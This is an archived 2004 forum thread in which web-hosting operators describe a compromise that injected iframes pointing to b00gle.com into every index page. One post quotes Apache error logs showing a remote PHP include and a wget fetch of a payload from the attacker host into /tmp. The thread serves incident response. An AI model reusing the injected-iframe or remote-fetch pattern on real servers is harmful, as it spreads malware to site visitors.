Index pages modified, iframes linking to b00gle.com inserted [Archive]

View Full Version : Index pages modified, iframes linking to b00gle.com inserted

Barty

05-22-2004, 10:39 AM

I've been having some security problems, obviously, somehow all index files have been altered by a script, an iframe linking to b00gle.com (a certain page on that site, containing a lot of javascripts, worms, ie exploits, ...) has been inserted so that all visitors viewing the altered files get pop-ups and scripts thrown at them.

Does anyone have experience dealing with these things? Can anyone shed a light on how those things are done, and how to prevent them?

If there is a script to automatically remove a certain text (the inserted iframe for example) from all index-files, that would also be appreciated a lot.

Thanks in advance

sp-nyp

05-24-2004, 12:15 PM

I have done some google-ing and found a few other people that seemed to have this same problem.

I have been unsuccessful as of yet in finding the exploit that they used to hak into the system and change the files.

On the compromised box we are running RH 7.2 with ensim 3.1.0-25

I know there are also various php scripts running on our server and was wondering if there are any specific exploits that could be used to alter index files for sites....? I have not found any scripts that are common to all the sites hacked.

Any help would be greatly appreciated.

sprintserve

05-24-2004, 12:19 PM

Yes, you can do a search and replace. But before that, is that what was done? the code having been inserted into all the pages ?

Barty

05-24-2004, 12:49 PM

On all index pages, this script added the iframe right after the <body> tag. I saved an 'infected' file, should it be usefull to post here. But there's not much too see but an iframe linking to a certain page on b00gle.

I found the following things in my apache error log: (url's changed slightly because of problems posting)

-------------------
ls: /usr/bin/X11/X: No such file or directory
[Thu May 20 02:18:15 2004] [error] PHP Warning: system(): Cannot execute a blank command in b00gleDOTcom/s/2.inc on line 14

ls: /usr/bin/X11/X: No such file or directory
[Thu May 20 17:33:58 2004] [error] PHP Warning: system(): Cannot execute a blank command in b00gleDOTcom/s/2.inc on line 14
ls: /usr/bin/X11/X: No such file or directory
--17:34:45-- b00gleDOTcom/cli.gz
=> `/tmp/a.out'
Resolving b00gleDOTcom... done.
Connecting to b00gleDOTcom[62.65.252.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,902 [text/plain]

0K .......... ...... 100% 14.96 KB/s

17:34:48 (14.96 KB/s) - `/tmp/a.out' saved [16902/16902]
-------------------

This might be usefull: b00gleDOTcom/s/